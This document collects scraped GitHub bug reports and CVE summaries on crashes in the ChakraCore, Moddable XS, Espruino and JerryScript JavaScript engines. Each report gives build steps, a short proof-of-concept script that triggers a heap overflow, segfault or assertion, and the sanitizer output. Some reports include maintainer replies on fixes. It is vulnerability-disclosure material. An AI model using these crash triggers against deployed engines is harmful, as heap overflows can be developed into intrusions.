There is an ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse in ChakraCore version 1.12.0.0-beta.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse #6453**

Open

owl337 opened this issue

Jun 1, 2020

· 0 comments

**Comments**

![@owl337](https://avatars.githubusercontent.com/u/29652500?s=88&v=4)

**ChakraCore version:**

version 1.12.0.0-beta

**Build Commond**

./build.sh --debug

**OS**

Ubuntu 16.04.6 LTS (Linux 4.4.0-142-generic x86\_64)

**Test case**

    function test0() {
      var func2 = (async (xsbazt = hkvvxr(x)) => [...[
            -2,
          ]]);
      var a = -191;
      func3(a);
    }
    
    function Run(){
        WScript.Echo('PASSED');
    }
    
    
    WScript.Attach(Run);
    

**Output**

    ASSERTION 202914: (ChakraCore/lib/Runtime/Debug/DebugContext.cpp, line 359) pFuncBody->GetYieldRegister() == oldYieldRegister
     Failure: (pFuncBody->GetYieldRegister() == oldYieldRegister)
    Illegal instruction
    

Credits: This vulnerability is detected by chong from OWL337.

![@owl337](https://avatars.githubusercontent.com/u/29652500?s=60&v=4) owl337 changed the title DebugBreak in Js::DebugContext::RundownSourcesAndReparse ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse

Jun 1, 2020

2 participants

 ![@ppenzin](https://avatars.githubusercontent.com/u/3345781?s=52&v=4)![@owl337](https://avatars.githubusercontent.com/u/29652500?s=52&v=4)

CVE-2020-23315: ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse · Issue #6453 · chakra-core/ChakraCore

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via xs/sources/xsDataView.c in fxUint8Getter.

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 

**Test case**

var buf \= new ArrayBuffer(65552);
var numbers \= new Uint8Array(buf);
function v() {
    return 7;
}
function JSEtest(a, b) {
    return { valueOf: v };
}
numbers.sort(JSEtest);

**Execution & Output**

 $ ./xst poc.js

=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90
READ of size 1 at 0x7f86d2bfe7ff thread T0
    #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883
    #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234
    #2 0x5558b4e8e7d9 in fx\_TypedArray\_prototype\_sort /root/moddable/xs/sources/xsDataView.c:2303
    #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281
    #7 0x7f86d6cd0bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x5558b4d1d789 in \_start (/root/moddable/build/bin/lin/debug/xst+0x93789)

0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region \[0x7f86d2bfe800,0x7f86d3bfe820)
allocated by thread T0 here:
    #0 0x7f86d773bb40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter
Shadow bytes around the buggy address:
  0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\[fa\]
  0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\=======ABORTING

Credits: Found by OWL337 team.

CVE-2021-46332: Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter · Issue #752 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via the component _fini.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV (/usr/local/bin/xst+0xdfee5f) in \_fini #768**

Open

hope-fly opened this issue

Jan 7, 2022

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    function JSEtest() {
        return { __proto__: setInterval(/a/g, "") } instanceof Array
            && !({ __proto__: null } instanceof Object);
    }
    
    if (!JSEtest())
        throw new Error("Test failed");
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

Error: Test failed
AddressSanitizer:DEADLYSIGNAL
=================================================================
==50961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000dfee60 (pc 0x000000dfee60 bp 0x7ffe67452190 sp 0x7ffe67452088 T0)

==50961==The signal is caused by a READ memory access.
==50961==Hint: PC is at a non-executable region. Maybe a wild jump?
    #0 0xdfee5f in \_fini (/usr/local/bin/xst+0xdfee5f)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/xst+0xdfee5f) in \_fini
==50961==ABORTING

Credits: Found by OWL337 team.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 8, 2022**

Thank you for the report!

The crash occurs in after the test exits. The call to fxDeleteMachine crashes when calls the destructor of the timer created by `setInterval`.

while (bSlot < cSlot) {
	if ((bSlot->kind == XS\_HOST\_KIND) && (bSlot->value.host.variant.destructor)) {
		if (bSlot->flag & XS\_HOST\_HOOKS\_FLAG) {
			if (bSlot->value.host.variant.hooks\->destructor)
				(\*(bSlot->value.host.variant.hooks\->destructor))(bSlot->value.host.data);
		}
		else
			(\*(bSlot->value.host.variant.destructor))(bSlot->value.host.data);
	}
	bSlot++;
}

This may be a bug in the `xst` tool rather than the XS engine. Either way, we'll fix that so it doesn't get in the way of testing.

mkellner pushed a commit that referenced this issue

Jan 17, 2022

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46329: SEGV (/usr/local/bin/xst+0xdfee5f) in _fini · Issue #768 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Heap-buffer-overflow in \_\_libc\_start\_main #751**

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make debug

**Test case**

function JSEtest(x, n) {
    while (x.length < n) {
        x += x;
    }
    return x.substring(0, n);
}

var x \= JSEtest("1", 1 << 20);
var rep \= JSEtest("$1", 1 << 16);
var y \= x.replace(/(.+)/g, rep);
y.length;

**Execution & Output**

 $ ./xst test.js

=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408
WRITE of size 1048576 at 0x7f62dd0fe820 thread T0
    #0 0x7f62e0bf4779  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x79779)
    #1 0x564bd7f19243 in memcpy /usr/include/x86\_64-linux-gnu/bits/string\_fortified.h:34
    #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989
    #3 0x564bd7e46db6 in fx\_RegExp\_prototype\_replace /root/moddable/xs/sources/xsRegExp.c:834
    #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #5 0x564bd7f1c334 in fx\_String\_prototype\_withRegexp /root/moddable/xs/sources/xsString.c:1675
    #6 0x564bd7f1c334 in fx\_String\_prototype\_replace /root/moddable/xs/sources/xsString.c:1120
    #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281
    #11 0x7f62e01eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x564bd79f70c9 in \_start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region \[0x7f62dc0fe800,0x7f62dd0fe820)
allocated by thread T0 here:
    #0 0x7f62e0c59b40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506
    #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170
    #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367
    #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259
    #5 0x7f62e01eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x79779)
Shadow bytes around the buggy address:
  0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0fecdba17d00: 00 00 00 00\[fa\]fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Dec 21, 2021**

Nice find. We have eliminated several other integer overflow issues recently, but clearly overlooked this one.

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable

Espruino 2v11.251 was discovered to contain a SEGV vulnerability via src/jsinteractive.c in jsiGetDeviceFromClass.

**Espruino revision**

Commit: 53108085  
Version: 2v11.251

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CCFLAGS='\-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

**Test case**

function JSEtest(v, i) {
    if (i \=== 1) {
        return v \=== 12;
    }
    return false;
}

var obj \= {
    length: 2
};
var h \= 11;

Object.defineProperty(obj, "1", {
    get: Serial1.setup,
    set: function (args) {
        h \= args;
    },
    configurable: true
});

Object.defineProperty(obj, "0", {
    get: obj\[1\],
    configurable: true
});

assert(Array.prototype.some.call(obj, JSEtest));

**Execution & Output**

./Espruino/espruino poc.js

ASAN:DEADLYSIGNAL 
=================================================================
=========ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564b36989594 bp 0x7ffddbd07060 sp 0x7ffddbd07060 T0)
=========The signal is caused by a READ memory access.
=====Hint: address points to the zero page.
#0 0x564b36989593 in jsiGetDeviceFromClass src/jsinteractive.c:100
#1 0x564b36e1e10c in jswrap\_serial\_setup src/jswrap\_serial.c:283
#2 0x564b36948eee in jsnCallFunction src/jsnative.c:223
#3 0x564b3695a983 in jspeFunctionCall src/jsparse.c:609
#4 0x564b36981d1e in jspExecuteFunction src/jsparse.c:3044
#5 0x564b3687d2ce in jsvExecuteGetter src/jsvar.c:1965
#6 0x564b3687ec87 in jsvSkipNameWithParent src/jsvar.c:2199
#7 0x564b3687f34d in jsvSkipName src/jsvar.c:2212
#8 0x564b3687f34d in jsvSkipNameAndUnLock src/jsvar.c:2244
#9 0x564b3697cb58 in jspeFactorObject src/jsparse.c:1261
#10 0x564b36979ed2 in jspeFactor src/jsparse.c:1673
#11 0x564b3695c91f in jspeFactorFunctionCall src/jsparse.c:1160
#12 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
#13 0x564b36959436 in jspeBinaryExpression src/jsparse.c:1955
#14 0x564b36959436 in jspeConditionalExpression src/jsparse.c:1991
#15 0x564b36959436 in jspeAssignmentExpression src/jsparse.c:2050
#16 0x564b36959436 in jspeFunctionCall src/jsparse.c:578
#17 0x564b3695cbd2 in jspeFactorFunctionCall src/jsparse.c:1184
#18 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
#19 0x564b3696183e in jspeBinaryExpression src/jsparse.c:1955
#20 0x564b3696183e in jspeConditionalExpression src/jsparse.c:1991
#21 0x564b3696183e in jspeAssignmentExpression src/jsparse.c:2050
#22 0x564b3696183e in jspeExpression src/jsparse.c:2056
#23 0x564b3696f6d4 in jspeBlockOrStatement src/jsparse.c:2124
#24 0x564b36971a1e in jspParse src/jsparse.c:2136
#25 0x564b369803ea in jspEvaluateVar src/jsparse.c:2996
#26 0x564b369803ea in jspEvaluate src/jsparse.c:3026
#27 0x564b36790025 in main targets/linux/main.c:460
#28 0x7f5e1f196bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
#29 0x564b36793bc9 in \_start (/root/Espruino/espruino+0x4ebc9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass

CVE-2021-46323: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass · Issue #2122 · espruino/Espruino

Moddable SDK v11.5.0 was discovered to contain an invalid memory access vulnerability via the component __asan_memmove.

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    var arr = [];
    for (var i = 0; i < 28000; i++) {
        arr.push(new RegExp("ACAAAAATTAGCCGGGCGTGGTGGCGCGCGCCTGTAATCCCA" + i.toString(3)));
    }
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js
=================================================================
==106165==ERROR: AddressSanitizer: negative-size-param: (size=-2147483584)
    #0 0x4ed5ec in \_\_asan\_memmove (/usr/local/bin/xst+0x4ed5ec)
    #1 0x762e01 in fxSweep /root/moddable/xs/sources/xsMemory.c:1629:6
    #2 0x75a711 in fxCollect /root/moddable/xs/sources/xsMemory.c:278:3
    #3 0x767e87 in fxFindChunk /root/moddable/xs/sources/xsMemory.c:407:3
    #4 0x7678dd in fxNewChunk /root/moddable/xs/sources/xsMemory.c:1256:10
    #5 0x9a70e4 in fxCompileRegExp /root/moddable/xs/sources/xsre.c:1697:13
    #6 0x8469f7 in fxInitializeRegExp /root/moddable/xs/sources/xsRegExp.c:138:7
    #7 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #8 0x845fb6 in fx\_RegExp /root/moddable/xs/sources/xsRegExp.c:235:2
    #9 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #10 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #11 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #12 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #13 0x7f80e3cdfbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #14 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

0x7f80e004d7f0 is located 331760 bytes inside of 16777248-byte region \[0x7f80dfffc800,0x7f80e0ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7f80e3cdfbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: negative-size-param (/usr/local/bin/xst+0x4ed5ec) in \_\_asan\_memmove
\==106165\==ABORTING

**No-ASAN Output**

\[1\]    131060 segmentation fault  xst poc.js

Credits: Found by OWL337 team.

CVE-2021-46333: Negative-size-param (/usr/local/bin/xst+0x4ed5ec) in __asan_memmove · Issue #769 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsDataView.c in fx_ArrayBuffer_prototype_concat.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV xs/sources/xsDataView.c:559:24 in fx\_ArrayBuffer\_prototype\_concat #774**

Closed

hope-fly opened this issue

Jan 10, 2022

· 5 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    function JSEtest(f, args) {
        var bound = Function.prototype.bind.apply(f, new ArrayBuffer(64).concat(new Object));
        return new bound();
    }
    var d = JSEtest(Date, [1957, 4, 27]);
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==62908==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000061df67 bp 0x7fff84c54690 sp 0x7fff84c544f0 T0)
==62908==The signal is caused by a READ memory access.
==62908==Hint: address points to the zero page.
    #0 0x61df66 in fx\_ArrayBuffer\_prototype\_concat /root/moddable/xs/sources/xsDataView.c:559:24
    #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #5 0x7f1a84524bf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsDataView.c:559:24 in fx\_ArrayBuffer\_prototype\_concat
==62908==ABORTING

Credits: Found by OWL337 team.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

Thank you for the report.

This PoC can be simplified:

new ArrayBuffer(64).concat({})

FWIW – `Array.prototype.concat` is an extension to JavaScript by XS, not part of EcmaScript standard.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

It looks like the problem is missing braces. 🤦

if (slot && (slot->kind == XS\_ARRAY\_BUFFER\_KIND))

arrayBuffer = slot;

bufferInfo = slot->next;

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

that's interesting, I'll note it 😉

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

It looks like that problem snuck in with recent changes to the internal XS buffer representation. I imagine some linter would pick that mistake up.

mkellner pushed a commit that referenced this issue

Jan 10, 2022

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46330: SEGV xs/sources/xsDataView.c:559:24 in fx_ArrayBuffer_prototype_concat · Issue #774 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsProxy.c in fxProxyGetPrototype.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype #750**

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 

**Test case**

function JSEtest(proxyTarget) {
  var {
    proxy,
    revoke
  } \= Proxy.revocable(proxyTarget, new Proxy({}, {
    get(target, propertyKey, receiver) {
      revoke();
    }
  }));
  return proxy;
}

Object.getPrototypeOf(JSEtest({}));

**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

ASAN:DEADLYSIGNAL
=================================================================
==68595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x55aceefcfbc1 bp 0x7ffebf0ad710 sp 0x7ffebf0ad6c0 T0)
==68595==The signal is caused by a READ memory access.
==68595==Hint: address points to the zero page.
    #0 0x55aceefcfbc0 in fxProxyGetPrototype /root/moddable/xs/sources/xsProxy.c:506
    #1 0x55acef001f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #2 0x55acef06cc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #3 0x55acef27e90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #4 0x55aceeba54c7 in main /root/moddable/xs/tools/xst.c:281
    #5 0x7f00319aabf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55aceeba70c9 in \_start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsProxy.c:506 in fxProxyGetPrototype
==68595==ABORTING

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Dec 21, 2021**

This is a far reaching bug: the `Proxy` implementation was not defending against `NULL` target (e.g. a revoked proxy) in many paths. We have reviewed the implementation to try to resolve all of those.

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46331: SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype · Issue #750 · Moddable-OpenSource/moddable

There is an Assertion 'ecma_is_lexical_environment (object_p)' failed at /base/ecma-helpers.c(ecma_get_lex_env_type) in JerryScript 3.0.0.

**JerryScript revision**

Commit: 42523bd6

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --linker-flag=-fuse-ld=gold --profile=es2015-subset --stack-limit=20

ASAN closed

**Test case**

var i \= 0;
var a \= \[\];
var JSEtest \= \[\];

JSEtest.\_\_defineGetter\_\_(0, function NaN() {
  if (i++ \> 2) {
    return;
  }

  JSEtest.shift();
  gc();
  a.push(0);
  a.concat(JSEtest);
});

JSEtest\[0\];

​

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_is\_lexical\_environment (object\_p)' failed at /home/f1yh0p/jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma\_get\_lex\_env\_type):291.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Credits: Found by OWL337 team.

CVE-2021-46338: Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma-helpers.c (ecma_get_lex_env_type). · Issue #4900 · jerryscript-project/jerryscript

Moddable SDK v11.5.0 was discovered to contain a NULL pointer dereference in the component fx_Function_prototype_hasInstance.

**Build environment**

